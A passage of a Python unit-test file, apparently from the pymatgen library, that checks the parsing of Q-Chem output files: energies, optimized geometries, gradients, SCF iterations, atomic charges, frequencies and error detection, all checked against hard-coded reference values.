self.assertEqual(qcinp_mgbf4.jobs[0].ghost_atoms, [0])
def test_to_and_from_dict(self):
qctask1 = QcTask(mol, title="Test Methane Opt", exchange="B3LYP",
jobtype="Opt", basis_set="6-31+G*")
qctask2 = QcTask(molecule="read", title="Test Methane Frequency",
exchange="B3LYP", jobtype="Freq",
basis_set="6-31+G*")
qctask3 = QcTask(title="Test Methane Single Point Energy",
exchange="B3LYP", jobtype="SP",
basis_set="6-311+G(3df,2p)")
qcinp1 = QcInput(jobs=[qctask1, qctask2, qctask3])
d1 = qcinp1.as_dict()
qcinp2 = QcInput.from_dict(d1)
d2 = qcinp2.as_dict()
self.assertEqual(d1, d2)
class TestQcOutput(PymatgenTest):
def test_energy(self):
ref_energies_text = '''
{
"hf-rimp2.qcout": {
"RIMP2": -2726.6860779805256,
"SCF": -2721.541435904716
},
"hf_b3lyp.qcout": {
"SCF": -2733.1747178920828
},
"hf_ccsd(t).qcout": {
"CCSD": -2726.7627121001865,
"CCSD(T)": -2726.8283514003333,
"MP2": -2726.685664155242,
"SCF": -2721.5414360843106
},
"hf_cosmo.qcout": {
"SCF": -2721.1752937496067
},
"hf_hf.qcout": {
"SCF": -2721.541435904716
},
"hf_lxygjos.qcout": {
"SCF": -2724.0769973875713,
"XYGJ-OS": -2726.3445157759393
},
"hf_mosmp2.qcout": {
"MOS-MP2": -2725.302538779482,
"SCF": -2721.541435904716
},
"hf_mp2.qcout": {
"MP2": -2726.685661962005,
"SCF": -2721.541435904716
},
"hf_pcm.qcout": {
"SCF": -2720.703940318968
},
"hf_qcisd(t).qcout": {
"QCISD": -2726.7853751012344,
"QCISD(T)": -2726.8346541282745,
"SCF": -2721.5414360843106
},
"hf_riccsd(t).qcout": {
"CCSD": -2726.7641790658904,
"CCSD(T)": -2726.829853468723,
"MP2": -2726.6860802173014,
"SCF": -2721.5414360843106
},
"hf_tpssh.qcout": {
"SCF": -2732.938974944255
},
"hf_xyg3.qcout": {
"SCF": -2728.769906036435,
"XYG3": -2731.0640917605806
},
"hf_xygjos.qcout": {
"SCF": -2724.0769973875713,
"XYGJ-OS": -2726.3447230967517
}
}'''
ref_energies = json.loads(ref_energies_text)
parsed_energies = dict()
# noinspection PyUnresolvedReferences
for filename in glob.glob(os.path.join(test_dir, "qchem_energies",
"*.qcout")):
molname = os.path.basename(filename)
qcout = QcOutput(filename)
d = dict(qcout.data[0]["energies"])
parsed_energies[molname] = d
self.assertEqual(sorted(ref_energies.keys()),
sorted(parsed_energies.keys()))
mols = sorted(ref_energies.keys())
for molname in mols:
self.assertEqual(sorted(ref_energies[molname].keys()),
sorted(parsed_energies[molname].keys()))
methods = sorted(ref_energies[molname].keys())
for method in methods:
self.assertAlmostEqual(ref_energies[molname][method],
parsed_energies[molname][method], 2)
def test_unable_to_determine_lambda_in_geom_opt(self):
filename = os.path.join(test_dir, "unable_to_determine_lambda_in_geom_opt.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]['errors'],
['Lamda Determination Failed',
'Geometry optimization failed'])
def test_geom_opt(self):
filename = os.path.join(test_dir, "thiophene_wfs_5_carboxyl.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["jobtype"], "opt")
ans_energies = [(u'SCF', -20179.886441383995),
(u'SCF', -20180.12187218424),
(u'SCF', -20180.150524404988),
(u'SCF', -20180.151628362753),
(u'SCF', -20180.151810235497),
(u'SCF', -20180.15180854295)]
self.assertEqual(qcout.data[0]["energies"], ans_energies)
ans_mol1 = '''Full Formula (H4 C5 S1 O2)
Reduced Formula: H4C5SO2
Charge = -1, Spin Mult = 2
Sites (12)
0 C 0.158839 -0.165379 0.000059
1 C -0.520531 -1.366720 0.000349
2 C -1.930811 -1.198460 -0.000041
3 C -2.297971 0.127429 -0.000691
4 S -0.938312 1.189630 0.000400
5 H -0.014720 -2.325340 0.000549
6 H -2.641720 -2.017721 -0.000161
7 H -3.301032 0.535659 -0.001261
8 C 1.603079 0.076231 -0.000101
9 O 2.131988 1.173581 -0.000330
10 O 2.322109 -1.079218 -0.000021
11 H 3.262059 -0.820188 -0.000171'''
ans_mol_last = '''Full Formula (H4 C5 S1 O2)
Reduced Formula: H4C5SO2
Charge = -1, Spin Mult = 2
Sites (12)
0 C 0.194695 -0.158362 -0.001887
1 C -0.535373 -1.381241 -0.001073
2 C -1.927071 -1.199274 -0.000052
3 C -2.332651 0.131916 0.000329
4 S -0.942111 1.224916 -0.001267
5 H -0.038260 -2.345185 -0.001256
6 H -2.636299 -2.025939 0.000620
7 H -3.339756 0.529895 0.001288
8 C 1.579982 0.071245 -0.002733
9 O 2.196383 1.165675 -0.000178
10 O 2.352341 -1.114671 0.001634
11 H 3.261096 -0.769470 0.003158'''
self.assertEqual(qcout.data[0]["molecules"][0].__str__(), ans_mol1)
self.assertEqual(str(qcout.data[0]["molecules"][-1]), ans_mol_last)
self.assertFalse(qcout.data[0]["has_error"])
ans_gradient = [{'max_gradient': 0.07996,
'gradients': [(-0.0623076, -0.0157774, -2.05e-05),
(0.0260287, 0.0289157, -6e-06),
(-0.015738, 0.0103583, 1.87e-05),
(0.0260219, -0.0028, -1.36e-05),
(-0.0043158, -0.0245896, 2.83e-05),
(4.8e-05, 0.000782, 1.3e-06),
(0.0014679, 0.0020277, 3.9e-06),
(0.0010437, -1.29e-05, -1.04e-05),
(0.0799585, 0.0204159, 1e-06),
(-0.0320357, -0.0421461, 2.1e-06),
(-0.0237691, 0.0247526, -4.6e-06),
(0.0035975, -0.0019264, -3e-07)],
'rms_gradient': 0.02244},
{'max_gradient': 0.02721,
'gradients': [(-0.0195677, -0.0008468, -3.2e-06),
(0.0106798, 0.0039494, 1.11e-05),
(-0.0086473, -0.0012624, -8.1e-06),
(0.0065018, 0.0033749, 5e-07),
(0.0002581, -0.0060831, 7.2e-06),
(-0.0004373, -0.000504, 1.4e-06),
(0.0003216, 0.0001059, -9e-07),
(-0.000814, -5.03e-05, 3e-07),
(0.0272109, 0.001408, -2.06e-05),
(-0.0086971, -0.009251, 8.3e-06),
(-0.0080925, 0.0112191, 2.9e-06),
(0.0012838, -0.0020597, 1.1e-06)],
'rms_gradient': 0.007037},
{'max_gradient': 0.003444,
'gradients': [(0.0021606, 0.0013094, -1.68e-05),
(0.0005757, -0.0002616, -1e-05),
(2.73e-05, -0.0002868, 1.5e-05),
(0.0001088, 0.0006944, -1.23e-05),
(0.0006912, -0.0006523, 6.1e-06),
(-0.0004191, -9.32e-05, -1.3e-06),
(0.0002288, 3.98e-05, 1.8e-06),
(-8.99e-05, -0.0002338, -3.2e-06),
(1.95e-05, -0.0034439, 7.08e-05),
(-0.0008228, -9.18e-05, -2.77e-05),
(-0.0018054, 0.0034031, -2.21e-05),
(-0.0006747, -0.0003834, -3e-07)],
'rms_gradient': 0.001008},
{'max_gradient': 0.002367,
'gradients': [(-0.0001646, 0.0006149, 4.17e-05),
(-0.0004516, -0.0003116, 1.28e-05),
(0.0003366, -3.27e-05, -1.59e-05),
(-0.0003164, 0.0001775, 1.37e-05),
(0.0001399, -0.0001201, -6.9e-06),
(-0.0001374, -1.58e-05, 9e-07),
(-1.19e-05, -3.93e-05, -3.3e-06),
(-1.76e-05, -0.0001233, 5.1e-06),
(9.73e-05, -0.0023668, -0.0001609),
(0.0006998, 0.0009023, 6.31e-05),
(-0.0002169, 0.0014874, 4.95e-05),
(4.28e-05, -0.0001724, 2e-07)],
'rms_gradient': 0.0005339},
{'max_gradient': 0.001246,
'gradients': [(-6.88e-05, 0.0001757, -8.32e-05),
(-0.0002264, -0.0001306, -1.93e-05),
(0.0001526, -1.39e-05, 2.05e-05),
(-0.0001401, 3.8e-06, -2.05e-05),
(1.52e-05, 0.0001152, 8e-06),
(2.01e-05, -3.69e-05, -1e-06),
(-3.62e-05, -3.51e-05, 5.5e-06),
(1.01e-05, -1.23e-05, -6.8e-06),
(9.73e-05, -0.0012462, 0.0003246),
(0.0003926, 0.0008331, -0.0001269),
(-0.0002294, 0.000281, -0.0001009),
(1.3e-05, 6.61e-05, 0.0)],
'rms_gradient': 0.0002814},
{'max_gradient': 0.0006359,
'gradients': [(0.0001036, -0.0001339, 0.0001633),
(0.0001003, 6.98e-05, 3.43e-05),
(-8.28e-05, 1.1e-05, -3.31e-05),
(6.2e-05, -0.0001068, 3.41e-05),
(-5.02e-05, 0.0001346, -1.18e-05),
(8.72e-05, -7.3e-06, 1.5e-06),
(-1.7e-05, 4.9e-06, -1.05e-05),
(1.29e-05, 5.9e-05, 1.26e-05),
(-0.0001059, -5.4e-06, -0.0006359),
(-1.48e-05, 0.0002152, 0.0002469),
(-0.0001335, -0.0003534, 0.0001988),
(3.83e-05, 0.0001124, -1e-07)],
'rms_gradient': 0.0001535}]
self.assertEqual(qcout.data[0]["gradients"], ans_gradient)
ans_inp = '''$molecule
-1 2
C 0.15884000 -0.16538000 0.00006000
C -0.52053000 -1.36672000 0.00035000
C -1.93081000 -1.19846000 -0.00004000
C -2.29797000 0.12743000 -0.00069000
S -0.93831000 1.18963000 0.00040000
H -0.01472000 -2.32534000 0.00055000
H -2.64172000 -2.01772000 -0.00016000
H -3.30103000 0.53566000 -0.00126000
C 1.60308000 0.07623000 -0.00010000
O 2.13199000 1.17358000 -0.00033000
O 2.32211000 -1.07922000 -0.00002000
H 3.26206000 -0.82019000 -0.00017000
$end
$rem
jobtype = opt
exchange = b3lyp
basis = 6-31+g*
$end
'''
self.assertEqual(str(qcout.data[0]['input']), ans_inp)
self.assertTrue(qcout.data[0]['gracefully_terminated'])
ans_scf_iter = [[(-743.3130310589, 0.0561),
(-741.3557302205, 0.00841),
(-740.7031048846, 0.0157),
(-741.5589873953, 0.00303),
(-741.5918010434, 0.00118),
(-741.5966923809, 0.000332),
(-741.5970287119, 0.000158),
(-741.5971282029, 4.38e-05),
(-741.5971448077, 2.17e-05),
(-741.5971501973, 7.7e-06),
(-741.5971533576, 5.05e-06),
(-741.5971541122, 2.7e-06),
(-741.5971544119, 9.48e-07),
(-741.5971544408, 2.61e-07),
(-741.5971544436, 1.21e-07),
(-741.5971544441, 5.45e-08),
(-741.5971544442, 1.77e-08),
(-741.5971544442, 7.79e-09)],
[(-741.5552794274, 0.00265),
(-741.6048574279, 0.000515),
(-741.6037290502, 0.000807),
(-741.6056978336, 0.000188),
(-741.6057976553, 4.78e-05),
(-741.6058045572, 1.54e-05),
(-741.6058057373, 4.51e-06),
(-741.6058061671, 2.91e-06),
(-741.6058062822, 8.32e-07),
(-741.6058063435, 7.17e-07),
(-741.6058063636, 1.97e-07),
(-741.6058063662, 5.03e-08),
(-741.6058063666, 3.35e-08),
(-741.6058063666, 1.24e-08),
(-741.6058063666, 5.25e-09)],
[(-741.6023833754, 0.0013),
(-741.6065067966, 0.000305),
(-741.6057886337, 0.000559),
(-741.6068434004, 7.61e-05),
(-741.6068555361, 3.4e-05),
(-741.6068589376, 5.66e-06),
(-741.6068591778, 2.95e-06),
(-741.60685927, 1.27e-06),
(-741.6068592962, 4.82e-07),
(-741.6068593106, 3.84e-07),
(-741.6068593157, 9.23e-08),
(-741.6068593162, 2.49e-08),
(-741.6068593163, 1.52e-08),
(-741.6068593163, 5.71e-09)],
[(-741.6012175391, 0.000209),
(-741.6068794773, 7.2e-05),
(-741.606851035, 0.000117),
(-741.606899078, 1.53e-05),
(-741.6068997567, 6.01e-06),
(-741.6068998747, 1.68e-06),
(-741.6068998849, 5.32e-07),
(-741.6068998857, 2.76e-07),
(-741.606899886, 6.41e-08),
(-741.606899886, 3.08e-08),
(-741.606899886, 9.5e-09)],
[(-741.6067290885, 0.0001),
(-741.6069044268, 2.64e-05),
(-741.6068991026, 5.29e-05),
(-741.6069065234, 3.51e-06),
(-741.6069065452, 2.49e-06),
(-741.6069065686, 3.57e-07),
(-741.6069065693, 2.59e-07),
(-741.6069065696, 7.05e-08),
(-741.6069065696, 4.44e-08),
(-741.6069065697, 1.52e-08),
(-741.6069065697, 8.17e-09)],
[(-741.6074251344, 0.000129),
(-741.6069044127, 2.43e-05),
(-741.6068998551, 4.95e-05),
(-741.6069064294, 4.49e-06),
(-741.606906478, 2.77e-06),
(-741.6069065049, 5.85e-07),
(-741.6069065068, 2.74e-07),
(-741.6069065073, 6.99e-08),
(-741.6069065074, 3.37e-08),
(-741.6069065075, 1.89e-08),
(-741.6069065075, 7.38e-09)]]
self.assertEqual(qcout.data[0]['scf_iteration_energies'], ans_scf_iter)
def test_multiple_step_job(self):
filename = os.path.join(test_dir, "CdBr2.qcout")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data), 3)
self.assertEqual(qcout.data[0]['jobtype'], 'opt')
self.assertEqual(qcout.data[1]['jobtype'], 'freq')
ans_thermo_corr_text = '''
{
"Rotational Enthalpy": 0.025714259,
"Rotational Entropy": 0.000833523586,
"Total Enthalpy": 0.199729978,
"Total Entropy": 0.003218965579,
"Translational Enthalpy": 0.038549707,
"Translational Entropy": 0.001851513374,
"Vibrational Enthalpy": 0.109795116,
"Vibrational Entropy": 0.000533928619,
"ZPE": 0.039330241,
"Zero point vibrational energy": 0.039330241,
"gas constant (RT)": 0.025714259
}'''
ans_thermo_corr = json.loads(ans_thermo_corr_text)
self.assertEqual(sorted(qcout.data[1]['corrections'].keys()),
sorted(ans_thermo_corr.keys()))
for k, ref in ans_thermo_corr.items():
self.assertAlmostEqual(qcout.data[1]['corrections'][k], ref)
self.assertEqual(len(qcout.data[1]['molecules']), 1)
ans_mol1 = '''Full Formula (Cd1 Br2)
Reduced Formula: CdBr2
Charge = 0, Spin Mult = 1
Sites (3)
0 Br 0.000000 0.000000 -2.453720
1 Cd 0.000000 0.000000 0.000000
2 Br 0.000000 0.000000 2.453720'''
self.assertEqual(str(qcout.data[1]['molecules'][0]), ans_mol1)
self.assertFalse(qcout.data[1]['has_error'])
self.assertEqual(qcout.data[1]['gradients'], [])
ans_inp = '''$molecule
read
$end
$rem
jobtype = freq
exchange = b3lyp
basis = gen
ecp = gen
max_scf_cycles = 100
scf_guess = gwh
$end
$basis
Br
srlc
****
Cd
srsc
****
$end
$ecp
Br
srlc
****
Cd
srsc
****
$end
'''
self.assertEqual(str(qcout.data[1]['input']), ans_inp)
ans_freq = [{'vib_mode': ((0.17, -0.475, 0.0),
(-0.236, 0.659, 0.0),
(0.17, -0.475, 0.0)),
'frequency': 61.36},
{'vib_mode': ((-0.475, -0.17, 0.0),
(0.659, 0.236, 0.0),
(-0.475, -0.17, 0.0)),
'frequency': 61.36},
{'vib_mode': ((0.0, 0.0, 0.707),
(0.0, 0.0, 0.0),
(0.0, 0.0, -0.707)),
'frequency': 199.94},
{'vib_mode': ((0.0, 0.0, -0.505),
(0.0, 0.0, 0.7),
(0.0, 0.0, -0.505)),
'frequency': 311.74}]
self.assertEqual(qcout.data[1]['frequencies'], ans_freq)
self.assertAlmostEqual(qcout.data[2]['energies'][0][1],
-5296.720741780598, 5)
ans_scf_iter_ene = [[(-176.9147092199, 0.779),
(-156.8236033975, 0.115),
(-152.9396694452, 0.157),
(-183.2743425778, 0.138),
(-182.2994943574, 0.142),
(-181.990425533, 0.143),
(-182.1690180647, 0.142),
(-106.6454708618, 0.239),
(-193.8056267625, 0.0432),
(-193.0854096948, 0.0455),
(-194.6340538334, 0.0062),
(-194.6495072245, 0.00205),
(-194.6508787796, 0.000189),
(-194.6508984743, 2.18e-05),
(-194.6508986262, 2.17e-06)]]
self.assertEqual(qcout.data[2]['scf_iteration_energies'],
ans_scf_iter_ene)
def test_solvent_method(self):
filename = os.path.join(test_dir, "thiophene_wfs_5_carboxyl.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["solvent_method"], "NA")
filename = os.path.join(test_dir, "qchem_energies", "hf_cosmo.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["solvent_method"], "cosmo")
filename = os.path.join(test_dir, "qchem_energies", "hf_pcm.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["solvent_method"], "pcm")
def test_failed_message(self):
scf_file = os.path.join(test_dir, "hf.qcout")
scf_qcout = QcOutput(scf_file)
self.assertTrue(scf_qcout.data[0]['has_error'])
self.assertEqual(scf_qcout.data[0]['errors'],
['Bad SCF convergence',
'Molecular charge is not found',
'Geometry optimization failed'])
geom_file = os.path.join(test_dir, "hf_opt_failed.qcout")
geom_qcout = QcOutput(geom_file)
self.assertTrue(geom_qcout.data[0]['has_error'])
self.assertEqual(geom_qcout.data[0]['errors'],
['Geometry optimization failed'])
def test_abnormal_exit(self):
no_reading_file = os.path.join(test_dir, "no_reading.qcout")
no_reading_qcout = QcOutput(no_reading_file)
self.assertTrue(no_reading_qcout.data[0]['has_error'])
self.assertEqual(no_reading_qcout.data[0]['errors'],
['Exit Code 134',
'Molecular charge is not found',
'No input text',
'Bad SCF convergence'])
exit_code_134_file = os.path.join(test_dir, "exit_code_134.qcout")
ec134_qcout = QcOutput(exit_code_134_file)
self.assertTrue(ec134_qcout.data[0]['has_error'])
self.assertEqual(ec134_qcout.data[0]['errors'],
['Exit Code 134',
'Molecular charge is not found',
'Bad SCF convergence'])
def test_chelp_and_mulliken_charges(self):
filename = os.path.join(test_dir, 'chelpg_charges.qcout')
qcout = QcOutput(filename)
mulliken_charges = [0.393961, -0.281545, 0.066432, 0.019364, -0.186041,
-0.16007, 0.315659, 0.30631, 0.064257, 0.056438,
-0.17695, 0.16976, -0.13326, -0.131853, -0.178711,
0.163697, 0.170148, 0.143329, 0.152702, 0.152929,
0.170475, -0.451542, -0.441554, -0.709834,
-0.592718, 0.20506, 0.211043, 0.204389, 0.546173,
-0.414558, 0.346511]
self.assertEqual(qcout.data[0]['charges']['mulliken'],
mulliken_charges)
chelpg_charges = [0.399404, -0.277179, -0.057502, -0.110085, -0.07107,
-0.274987, 0.475781, 0.423117, -0.054079, -0.101424,
-0.05793, 0.115179, -0.116069, -0.10949, -0.06664,
0.161442, 0.135438, 0.158081, 0.125881, 0.125324,
0.115863, -0.425251, -0.42309, -0.602375, -0.458844,
0.140267, 0.139084, 0.139995, 0.698011, -0.487911,
0.341061]
self.assertEqual(qcout.data[0]['charges']['chelpg'], chelpg_charges)
def test_no_message_scf_opt_fail(self):
so_failfile = os.path.join(test_dir, 'scf_opt_no_message_fail.qcout')
so_failqcout = QcOutput(so_failfile)
self.assertTrue(so_failqcout.data[0]['has_error'])
self.assertEqual(so_failqcout.data[0]['errors'],
['Exit Code 134',
'Molecular charge is not found',
'Bad SCF convergence',
'Geometry optimization failed'])
o_failfile = os.path.join(test_dir, 'opt_fail_no_message.qcout')
o_failqcout = QcOutput(o_failfile)
self.assertEqual(o_failqcout.data[0]['errors'],
['Geometry optimization failed'])
s_failfile = os.path.join(test_dir, 'scf_no_message_fail.qcout')
s_failqcout = QcOutput(s_failfile)
self.assertEqual(s_failqcout.data[0]['errors'],
['Exit Code 134',
'Molecular charge is not found',
'Bad SCF convergence'])
so_successfile = os.path.join(test_dir,
'thiophene_wfs_5_carboxyl.qcout')
so_successqcout = QcOutput(so_successfile)
self.assertFalse(so_successqcout.data[0]['has_error'])
def test_negative_eigen(self):
filename = os.path.join(test_dir, "negative_eigen.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]["errors"],
['Negative Eigen',
'Molecular charge is not found',
'Bad SCF convergence',
'Geometry optimization failed'])
def test_insufficient_memory(self):
filename = os.path.join(test_dir, "insufficient_memory.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]['errors'],
['Insufficient static memory',
'Molecular charge is not found',
'Bad SCF convergence',
'Geometry optimization failed'])
def test_freq_seg_too_small(self):
filename = os.path.join(test_dir, "freq_seg_too_small.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]['errors'],
['Freq Job Too Small',
'Exit Code 134'])
def test_not_enough_total_memory(self):
filename = os.path.join(test_dir, "not_enough_total_memory.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[1]['has_error'])
self.assertEqual(qcout.data[1]["errors"],
['Not Enough Total Memory',
'Exit Code 134'])
def test_killed(self):
filename = os.path.join(test_dir, "killed.qcout")
qcout = QcOutput(filename)
self.assertFalse(qcout.data[0]["has_error"])
self.assertTrue(qcout.data[1]["has_error"])
self.assertEqual(qcout.data[1]["errors"],
['Killed',
'Molecular charge is not found',
'Bad SCF convergence'])
def test_gdm_scf(self):
filename = os.path.join(test_dir, "gmd_scf.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]['errors'],
['Exit Code 134',
'Bad SCF convergence',
'Geometry optimization failed'])
self.assertEqual(len(qcout.data[0]['scf_iteration_energies']), 2)
self.assertEqual(len(qcout.data[0]['scf_iteration_energies'][-1]), 192)
self.assertAlmostEqual(qcout.data[0]['scf_iteration_energies'][-1][-1][0],
-1944.945908459, 5)
def test_crazy_scf_values(self):
filename = os.path.join(test_dir, "crazy_scf_values.qcout")
qcout = QcOutput(filename)
ans = [(-28556254.06737586, 6.49e-06),
(-28556254.067382727, 9.45e-06),
(-28556254.067382865, 6.14e-06)]
self.assertEqual(qcout.data[0]["scf_iteration_energies"][-1][-3:], ans)
def test_crowd_gradient_number(self):
filename = os.path.join(test_dir, "crowd_gradient_number.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]['gradients'][0]['gradients'],
[(-0.0307525, 0.0206536, -0.0396255),
(0.0008938, -0.000609, 0.0082746),
(0.042143, -0.0240514, 0.0380298),
(-0.0843578, 0.0002757, 0.0884924),
(0.0356689, -0.0444656, -0.0710646),
(-0.0190554, -0.0308886, -0.0297994),
(0.0470543, -0.0263915, -0.0690973),
(-0.0297801, 0.0296872, -0.0104344),
(0.0504581, -0.0014272, 0.0262245),
(-0.0927323, 0.0750046, 0.0128003),
(0.0183242, -0.0084638, 0.0127388),
(-0.0083989, 0.0111579, -0.0002461),
(-0.0316941, 267.34455, 878.3493251),
(0.017459, 0.0487124, -0.0276365),
(-0.3699134, 0.0110442, 0.0260809),
(0.363931, 0.24044, 0.5192852),
(0.026669, -0.0284192, -0.0347528),
(0.0047475, 0.0049706, 0.0148794),
(-0.077804, 0.003402, 0.000852),
(-6772.1697035, -267.4471902, -878.585931),
(-0.0029556, -0.0616073, -0.0180577),
(-0.0001915, 0.0021213, 0.0006193),
(0.0320436, -0.0073456, -0.01509),
(0.0155112, -0.0035725, 0.0015675),
(-0.0034309, 0.0170739, 0.0074455),
(-0.0088735, -0.0129874, 0.0092329),
(-0.0271963, -0.0258714, 0.0246954),
(0.0025065, 0.0062934, 0.0209733),
(0.0152829, -0.0080239, -0.018902),
(0.0461304, 0.0071952, 0.0012227),
(-0.0272755, -0.0280053, 0.0325455),
(0.0122118, 0.027816, -0.0167773),
(0.0168893, -0.0014211, 0.0039917),
(-0.0048723, 0.0026667, -0.0159952),
(-0.1840467, -0.1425887, -0.3235801),
(0.015975, -0.0922797, 0.0640925),
(0.0267234, 0.1031154, -0.0299014),
(-0.0175591, 0.0081813, -0.0165425),
(0.0119225, 0.0113174, 0.0154056),
(0.0138491, 0.0083436, 0.0188022),
(-0.0151146, -0.0015971, -0.0054462)])
def test_nbo_charges(self):
filename = os.path.join(test_dir, "quinoxaline_anion.qcout")
qcout = QcOutput(filename)
ans = [-0.29291, -0.29807, 0.12715, 0.12715, -0.29807, -0.29291,
0.21284, 0.22287, 0.22287, 0.21284, -0.10866, -0.10866,
0.19699, -0.5602, -0.5602, 0.19699]
self.assertEqual(qcout.data[0]["charges"]["nbo"], ans)
filename = os.path.join(test_dir, "tfsi_nbo.qcout")
qcout = QcOutput(filename)
ans = [2.2274, 2.23584, -0.94183, -0.94575, -0.94719, -0.9423,
0.86201, 0.85672, -0.35698, -0.35373, -0.35782, -0.35647,
-0.35646, -0.35787, -1.26555]
self.assertEqual(qcout.data[0]["charges"]["nbo"], ans)
filename = os.path.join(test_dir, "crowd_nbo_charges.qcout")
qcout = QcOutput(filename)
self.assertEqual(
qcout.data[0]["charges"]["nbo"],
[-0.33917, -0.6104, -0.15912, -0.17751, -0.61817, -0.3357, 0.24671,
0.19942, 0.19325, 0.2362, 0.23982, 0.21985, 0.2305, 0.20444,
0.23179, 0.20491, 0.85965, -0.59655, -0.59561, -0.14789, -0.13859,
-0.32712, -0.33359, 0.21602, 0.22383, 0.2123, 0.22759, 0.2507,
0.20098, 0.18631, 0.24945, 0.19709, 0.20274, -0.34831, -0.56307,
-0.14572, -0.1431, -0.55866, -0.3572, 0.22695, 0.21983, 0.1963,
0.20977, 0.22298, 0.20875, 0.21081, 0.19586, 0.24708, 0.20067,
-0.34288, -0.55793, -0.16806, -0.15609, -0.56464, -0.34695,
0.22555, 0.20417, 0.206, 0.20825, 0.22409, 0.25415, 0.20977,
0.18976, 0.24647, 0.1993, -0.33605, -0.59395, -0.15985, -0.18024,
-0.60646, -0.32742, 0.22909, 0.19347, 0.21872, 0.2203, 0.23518,
0.25185, 0.23523, 0.18666, 0.22737, 0.2205, -0.35902, -0.56138,
-0.14552, -0.14903, -0.55491, -0.3493, 0.22826, 0.21789, 0.19075,
0.20898, 0.21343, 0.21715, 0.20794, 0.19695, 0.2429, 0.18482,
-0.33943, -0.55659, -0.16437, -0.14503, -0.56155, -0.34131,
0.22339, 0.20483, 0.19376, 0.23395, 0.20784, 0.2096, 0.21945,
0.19192, 0.23089, 0.20493, -0.32963, -0.56949, -0.1446, -0.15244,
-0.55482, -0.34848, 0.22802, 0.20471, 0.19704, 0.20744, 0.22332,
0.2206, 0.20734, 0.18871, 0.22907, 0.20741, -0.33856, -0.564,
-0.16575, -0.17422, -0.56032, -0.3426, 0.22585, 0.20169, 0.20529,
0.20836, 0.21329, 0.25353, 0.23374, 0.19306, 0.23582, 0.20196,
-0.34069, -0.56522, -0.17228, -0.17503, -0.55505, -0.34264,
0.22696, 0.19604, 0.20515, 0.23964, 0.2437, 0.2111, 0.21204,
0.19975, 0.2347, 0.18835, -0.34324, -0.55184, -0.16086, -0.15907,
-0.56319, -0.3384, 0.23866, 0.19808, 0.19728, 0.20205, 0.24698,
0.21416, 0.20398, 0.20475, 0.2265, 0.20141, -0.34339, -0.56344,
-0.14955, -0.14878, -0.55906, -0.34506, 0.23937, 0.20027, 0.19671,
0.2085, 0.21693, 0.22164, 0.20863, 0.20703, 0.22889, 0.1916])
def test_simple_aimd(self):
filename = os.path.join(test_dir, "h2o_aimd.qcout")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data[0]["molecules"]), 11)
def test_homo_lumo(self):
filename = os.path.join(test_dir, "quinoxaline_anion.qcout")
qcout = QcOutput(filename)
for a, b in zip(qcout.data[0]["HOMO/LUMOs"][-1],
[1.00682120282, 2.80277253758]):
self.assertAlmostEqual(a, b, 5)
filename = os.path.join(test_dir, "qchem_energies", "hf_ccsd(t).qcout")
qcout = QcOutput(filename)
self.assertArrayAlmostEqual(qcout.data[0]["HOMO/LUMOs"],
[[-17.741823053011334, 5.224585929721129],
[-17.741823053011334, 5.224585929721129]], 4)
filename = os.path.join(test_dir, "crowd_gradient_number.qcout")
qcout = QcOutput(filename)
self.assertArrayAlmostEqual(
qcout.data[0]["HOMO/LUMOs"], [[-5.741602245683116,
-4.544301303455358],
[-4.9796834642654515,
-4.2993988379996795], [-4.761992383860404, -3.8095939070883236]], 4)
def test_bsse(self):
filename = os.path.join(test_dir, "bsse.qcout")
qcout = QcOutput(filename)
self.assertAlmostEqual(qcout.data[0]["bsse"], -0.164210762949, 5)
self.assertEqual(qcout.data[0]["jobtype"], "bsse")
def test_hirshfeld_charge(self):
filename = os.path.join(test_dir, "hirshfeld_population.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["charges"]["hirshfeld"],
[-0.286309, 0.143134, 0.143176])
self.assertFalse(qcout.data[0]["has_error"])
def test_ghost_atoms(self):
filename = os.path.join(test_dir, "ghost_atoms.qcout")
qcout = QcOutput(filename)
elements = [a.specie.symbol for a in qcout.data[-1]["molecules"][-1].sites]
self.assertEqual(elements, ['O', 'H', 'H', 'C', 'H', 'H', 'H', 'H'])
filename = os.path.join(test_dir, "MgBF4_b_overalpped.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["input"].ghost_atoms, [0])
def test_final_energy(self):
filename = os.path.join(test_dir, "thiophene_wfs_5_carboxyl.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.final_energy, -20180.15180854295)
def test_final_structure(self):
filename = os.path.join(test_dir, "thiophene_wfs_5_carboxyl.qcout")
qcout = QcOutput(filename)
ans = '''Full Formula (H4 C5 S1 O2)
Reduced Formula: H4C5SO2
Charge = -1, Spin Mult = 2
Sites (12)
0 C 0.194695 -0.158362 -0.001887
1 C -0.535373 -1.381241 -0.001073
2 C -1.927071 -1.199274 -0.000052
3 C -2.332651 0.131916 0.000329
4 S -0.942111 1.224916 -0.001267
5 H -0.038260 -2.345185 -0.001256
6 H -2.636299 -2.025939 0.000620
7 H -3.339756 0.529895 0.001288
8 C 1.579982 0.071245 -0.002733
9 O 2.196383 1.165675 -0.000178
10 O 2.352341 -1.114671 0.001634
11 H 3.261096 -0.769470 0.003158'''
self.assertEqual(qcout.final_structure.__str__(), ans)
def test_time_nan_values(self):
filename = os.path.join(test_dir, "time_nan_values.qcout")
qcout = QcOutput(filename)
self.assertFalse(qcout.data[0]["has_error"])
def test_pcm_solvent_deprecated(self):
filename = os.path.join(test_dir, "pcm_solvent_deprecated.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[-1]["has_error"])
ans = ['pcm_solvent deprecated',
